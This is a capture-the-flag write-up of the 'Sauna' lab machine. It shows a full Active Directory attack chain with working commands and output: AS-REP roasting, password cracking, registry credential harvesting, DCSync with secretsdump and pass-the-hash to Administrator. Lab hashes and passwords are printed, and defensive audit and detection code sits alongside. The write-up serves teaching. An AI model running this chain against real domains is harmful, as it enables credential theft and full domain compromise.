Sauna

TL;DR

  • Create a wordlist of usernames from the information on the website
  • ASRepRoasting: ask for a TGT for each candidate user and crack the password with JohnTheRipper
  • Find the service account stored for Autologin
  • Simulate the behavior of a Domain Controller (DCSync) to retrieve Administrator’s password hash
  • Pass the hash to get the Administrator account

User.txt

Reconnaissance

Let’s start with an Nmap scan:

magnussen@funcMyLife:~/sauna$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN sauna.txt 10.10.10.175
Nmap scan report for sauna.htb (10.10.10.175)
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2020-03-28 17:20:54 CET for 268s
Not shown: 65520 filtered ports
Reason: 65520 no-responses
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-03-28 23:25:09Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3269/tcp  open  tcpwrapped    syn-ack ttl 127
49673/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56267/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
64432/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 35558/tcp): CLEAN (Timeout)
|   Check 2 (port 64287/tcp): CLEAN (Timeout)
|   Check 3 (port 58329/udp): CLEAN (Timeout)
|   Check 4 (port 57297/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-03-29 00:26:02
|_  start_date: 1601-01-01 00:09:21

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 17:25:22 2020 -- 1 IP address (1 host up) scanned in 269.24 seconds

So we find some useful services:

  • DNS (53)
  • IIS (80)
  • Kerberos (88)
  • RPC (135, 593)
  • SMB (139, 445)
  • LDAP (389, 636, 3269)

We also find the domain: EGOTISTICAL-BANK.LOCAL

Let’s start by visiting the website:

Website

The website is pretty empty, but we find an interesting page where the team members are listed.

Team

User enumeration (think like an admin)

We know there is an Active Directory with Kerberos.

One common technique against Kerberos is to search for users that have the property ‘Do not require Kerberos preauthentication’ set.

When that option is set, the KDC answers an AS-REQ for the user with a TGT without requiring an authenticator (the username/timestamp encrypted with the client’s key). The encrypted part of the reply, which carries the session key, is encrypted with a key derived from the user’s password (the NTLM hash when RC4 is used). Since anyone can request that reply, we can crack it offline with JohnTheRipper.
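As an added example (not code from the write-up), here is the defender-side version of this check: the userAccountControl bit that GetNPUsers.py is about to probe for, decoded in Python, plus an LDAP filter that lists enabled accounts with pre-authentication disabled. The SAMPLE entries are constructed and assume the UAC values shown; they are not real output from the box.

```python
# Standard userAccountControl bit values.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000  # decimal 4194304

UAC_FLAGS = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

# LDAP bitwise-AND matching rule, used to test a single UAC bit on the server side.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(uac: int) -> list[str]:
    """Names of the known bits set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if uac & bit]


def is_asrep_roastable(uac: int) -> bool:
    """Pre-auth disabled AND account enabled: the KDC will hand an AS-REP
    encrypted with the user's key to anyone who asks for it."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH) and not uac & UF_ACCOUNTDISABLE


def asrep_roastable_filter() -> str:
    """LDAP filter that returns the same accounts directly from the DC."""
    rule = LDAP_MATCHING_RULE_BIT_AND
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{rule}:={UF_DONT_REQUIRE_PREAUTH})"
            f"(!(userAccountControl:{rule}:={UF_ACCOUNTDISABLE})))")


def audit(entries: list[dict]) -> list[str]:
    """sAMAccountNames of roastable accounts among LDAP-style records."""
    return [e["sAMAccountName"] for e in entries
            if is_asrep_roastable(int(e["userAccountControl"]))]


# Constructed sample of what an LDAP search for the box's users might return.
SAMPLE = [
    {"sAMAccountName": "HSmith", "userAccountControl": 66048},    # NORMAL | DONT_EXPIRE
    {"sAMAccountName": "FSmith", "userAccountControl": 4260352},  # + DONT_REQUIRE_PREAUTH
    {"sAMAccountName": "svc_loanmgr", "userAccountControl": 66048},
    {"sAMAccountName": "Guest", "userAccountControl": 4194818},   # disabled, pre-auth off
]
```

A disabled account with the bit set is not reported, since the KDC refuses it anyway; the fix for a flagged account is to clear the bit (or move it to a long random password if an application really needs it).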

Previously we found a probable list of users, but the format is Firstname Lastname, which is rarely used as an identifier in an Active Directory.

The three most used identifier formats are (the two parts can be joined directly or separated by a dot or a hyphen):

  • Firstname Lastname (Example: JohnDoe)
  • First Letter of the Firstname Lastname (Example: JDoe)
  • Three First Letters of the Firstname and Three First Letter of the Lastname (Example: JohDoe)

We generate the following wordlist:

fergussmith
fergus.smith
fergus-smith
FERGUSSMITH
FERGUS.SMITH
FERGUS-SMITH
FergusSmith
Fergus.Smith
Fergus-Smith
fsmith
f.smith
f-smith
FSMITH
F.SMITH
F-SMITH
FSmith
F.Smith
F-Smith
fersmi
fer.smi
fer-smi
FERSMI
FER.SMI
FER-SMI
FerSmi
Fer.Smi
Fer-Smi
hugobear
hugo.bear
hugo-bear
HUGOBEAR
HUGO.BEAR
HUGO-BEAR
HugoBear
Hugo.Bear
Hugo-Bear
hbear
h.bear
h-bear
HBEAR
H.BEAR
H-BEAR
HBear
H.Bear
H-Bear
hugbea
hug.bea
hug-bea
HUGBEA
HUG.BEA
HUG-BEA
HugBea
Hug.Bea
Hug-Bea
stevenkerb
steven.kerb
steven-kerb
STEVENKERB
STEVEN.KERB
STEVEN-KERB
StevenKerb
Steven.Kerb
Steven-Kerb
skerb
s.kerb
s-kerb
SKERB
S.KERB
S-KERB
SKerb
S.Kerb
S-Kerb
steker
ste.ker
ste-ker
STEKER
STE.KER
STE-KER
SteKer
Ste.Ker
Ste-Ker
shauncoins
shaun.coins
shaun-coins
SHAUNCOINS
SHAUN.COINS
SHAUN-COINS
ShaunCoins
Shaun.Coins
Shaun-Coins
scoins
s.coins
s-coins
SCOINS
S.COINS
S-COINS
SCoins
S.Coins
S-Coins
shacoi
sha.coi
sha-coi
SHACOI
SHA.COI
SHA-COI
ShaCoi
Sha.Coi
Sha-Coi
bowietaylor
bowie.taylor
bowie-taylor
BOWIETAYLOR
BOWIE.TAYLOR
BOWIE-TAYLOR
BowieTaylor
Bowie.Taylor
Bowie-Taylor
btaylor
b.taylor
b-taylor
BTAYLOR
B.TAYLOR
B-TAYLOR
BTaylor
B.Taylor
B-Taylor
bowtay
bow.tay
bow-tay
BOWTAY
BOW.TAY
BOW-TAY
BowTay
Bow.Tay
Bow-Tay
sophiedriver
sophie.driver
sophie-driver
SOPHIEDRIVER
SOPHIE.DRIVER
SOPHIE-DRIVER
SophieDriver
Sophie.Driver
Sophie-Driver
sdriver
s.driver
s-driver
SDRIVER
S.DRIVER
S-DRIVER
SDriver
S.Driver
S-Driver
sopdri
sop.dri
sop-dri
SOPDRI
SOP.DRI
SOP-DRI
SopDri
Sop.Dri
Sop-Dri
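The generator below reproduces this wordlist (3 formats x 3 casings x 3 separators per person); it is an added example rather than the author’s own script, and it takes the six names from the team page as input.

```python
# Names from the team page of the website.
TEAM = ["Fergus Smith", "Hugo Bear", "Steven Kerb",
        "Shaun Coins", "Bowie Taylor", "Sophie Driver"]

SEPARATORS = ("", ".", "-")


def name_formats(first: str, last: str) -> list[tuple[str, str]]:
    """The three (first_part, last_part) shapes: JohnDoe, JDoe, JohDoe."""
    return [
        (first, last),           # Firstname Lastname
        (first[:1], last),       # first initial + Lastname
        (first[:3], last[:3]),   # first three letters of each
    ]


def casings(a: str, b: str) -> list[tuple[str, str]]:
    """lower, UPPER and Title variants of both parts."""
    return [(a.lower(), b.lower()),
            (a.upper(), b.upper()),
            (a.capitalize(), b.capitalize())]


def candidates(first: str, last: str) -> list[str]:
    """All 27 candidates for one person, in the order of the wordlist above."""
    return [f"{ca}{sep}{cb}"
            for a, b in name_formats(first, last)
            for ca, cb in casings(a, b)
            for sep in SEPARATORS]


def build_wordlist(names: list[str]) -> list[str]:
    """Expand every "Firstname Lastname" entry; drop duplicates (possible with
    very short names) while keeping each word's first position."""
    words: list[str] = []
    for full in names:
        first, last = full.split(maxsplit=1)
        words.extend(candidates(first, last))
    return list(dict.fromkeys(words))


if __name__ == "__main__":
    # One name per line, the format GetNPUsers.py -usersfile expects.
    with open("wordlist.txt", "w") as fh:
        fh.write("\n".join(build_wordlist(TEAM)) + "\n")
```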

AD pentesting 101: ASRepRoasting and weak password

Let’s hope that one of these accounts exists and has the ‘Do not require Kerberos preauthentication’ property set.

magnussen@funcMyLife:~/sauna$ GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile wordlist.txt -format john -outputfile tgt.txt -dc-ip 10.10.10.175

It seems that the user FSmith fulfills our needs.

$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:89bb00d717574d4672657e868d32e210$[...]

Let’s try to crack the TGT (the AS-REP hash) with JohnTheRipper:

magnussen@funcMyLife:~/sauna$ john --wordlist=rockyou.txt tgt.txt
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:Thestrokes23

Let’s try to connect to this account with evil-winrm:

magnussen@funcMyLife:~/sauna$ ./evil-winrm.rb -u FSmith -p Thestrokes23 -i 10.10.10.175

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> dir
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf

User access, done!

I AM ROOT

SeChangeNotifyPrivilege & autologin

Let’s check the privileges of our user:

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /all

USER INFORMATION
----------------

User Name              SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Nothing really interesting, except SeChangeNotifyPrivilege (bypass traverse checking), which might allow us to perform directory traversal. Note that this privilege is granted to every user by default, so it is not a misconfiguration.

Even though we might not have permissions on a directory, we might still be able to read files located further down in that directory tree if we know their path.

Let’s see if some accounts have the Autologin feature activated.

Originally, I searched for passwords in the Registry, but the output is too big to include here; here’s the command anyway: reg query HKLM /f password /t REG_SZ /s

*Evil-WinRM* PS C:\Users\FSmith\Desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x8e3982368
    ShutdownFlags    REG_DWORD    0x80000027
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

Pretty simple, we retrieve the account: svc_loanmanager:Moneymakestheworldgoround! Note that the registry value says svc_loanmanager, whereas the account that actually exists in the domain (as the connection below shows) is svc_loanmgr.

DCSync

Let’s connect to this account and gather data for BloodHound:

magnussen@funcMyLife:~/sauna$ ./evil-winrm.rb -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.10.10.175

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-BloodHound -CollectionMethod All -DomainController EGOTISTICAL-BANK.LOCAL -LdapUser svc_loanmgr -LdapPass Moneymakestheworldgoround! -IgnoreLdapCert
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls


    Directory: C:\Users\svc_loanmgr\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/2/2020  12:03 PM           9287 20200402120337_BloodHound.zip
-a----         4/2/2020  12:01 PM         972811 SharpHound.ps1

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200402120337_BloodHound.zip
Info: Downloading C:\Users\svc_loanmgr\Documents\20200402120337_BloodHound.zip to 20200402120337_BloodHound.zip


Info: Download successful!

We retrieve the following graph in BloodHound.

BloodHound

The user svc_loanmgr has the GetChanges and GetChangesAll rights on the domain object; with these permissions we’ll be able to perform a DCSync attack on this box.

DCSync started as a command within Mimikatz that an attacker can leverage to simulate the behavior of a Domain Controller: using the directory replication protocol (DRSUAPI), the attacker pretends to be a Domain Controller and asks a real DC for user password data. We need the following permissions on the domain to perform the attack: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes In Filtered Set.

We’ll use secretsdump.py from Impacket, which implements the same replication request.

magnussen@funcMyLife:~/sauna$ secretsdump.py -just-dc svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:14f2712b1fc067c07340674f336a59a1:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:1fe7419bf3ddce9b30663ab860cbd2411462db6f451a9b08fee43b43d264715f
SAUNA$:aes128-cts-hmac-sha1-96:445f4b4c51415ca8dbfeca3a8c945a23
SAUNA$:des-cbc-md5:c19d13852ce3df9e
[*] Cleaning up...
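As an added example on the defensive side (not part of the write-up), the check below looks for DCSync-style requests in Windows Security event 4662: a principal other than a known replicator exercising the replication control access rights named above. The SAMPLE log lines are constructed, in a flattened key="value" form of the event’s fields, and assume SAUNA$ is the only expected replicator.

```python
import re

# Control access right GUIDs that show up in the Properties field of event 4662
# when a principal asks a DC to replicate directory data (the rights named above).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> dict[str, str]:
    """Turn a flattened key="value" event line into a dict."""
    return dict(FIELD_RE.findall(line))


def replication_rights(properties: str) -> list[str]:
    """Names of the replication rights present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(lines, expected_replicators: set[str]) -> list[tuple[str, list[str]]]:
    """(subject, rights) for every 4662 where a principal that is not a known
    replicator (DC machine accounts, Azure AD Connect, ...) used a replication right."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = replication_rights(ev.get("Properties", ""))
        subject = ev.get("SubjectUserName", "")
        if rights and subject.upper() not in expected_replicators:
            alerts.append((subject, rights))
    return alerts


# Constructed sample events (not logs from the box).
SAMPLE = [
    # DC-to-DC replication by the DC's own machine account: expected.
    'EventID="4662" SubjectUserName="SAUNA$" SubjectDomainName="EGOTISTICALBANK" '
    'Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    # A user account using both replication rights: what secretsdump -just-dc produces.
    'EventID="4662" SubjectUserName="svc_loanmgr" SubjectDomainName="EGOTISTICALBANK" '
    'Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    # An unrelated 4662 (placeholder GUID, no replication right): must not alert.
    'EventID="4662" SubjectUserName="FSmith" SubjectDomainName="EGOTISTICALBANK" '
    'Properties="{00000000-0000-0000-0000-000000000000}"',
]
```

Event 4662 only records these accesses when Directory Service Access auditing is enabled and the domain object’s SACL audits control access rights, so check the audit policy before relying on this detection.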

Let’s do some pass-the-hash: we won’t even have to crack the password to connect as Administrator!

magnussen@funcMyLife:~/sauna$ wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

01/23/2020  04:11 PM    <DIR>          .
01/23/2020  04:11 PM    <DIR>          ..
01/23/2020  11:22 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,139,856,384 bytes free
C:\Users\Administrator\Desktop>type root.txt
f3ee04965c68257382e31502cc5e881f

This was my first Windows machine; I’ve learned a lot of things about Kerberos and Active Directory environments. I still have a lot to learn about Windows and Active Directory attacks, but it was a really great introduction!

Thanks Egotisticalsw for the box!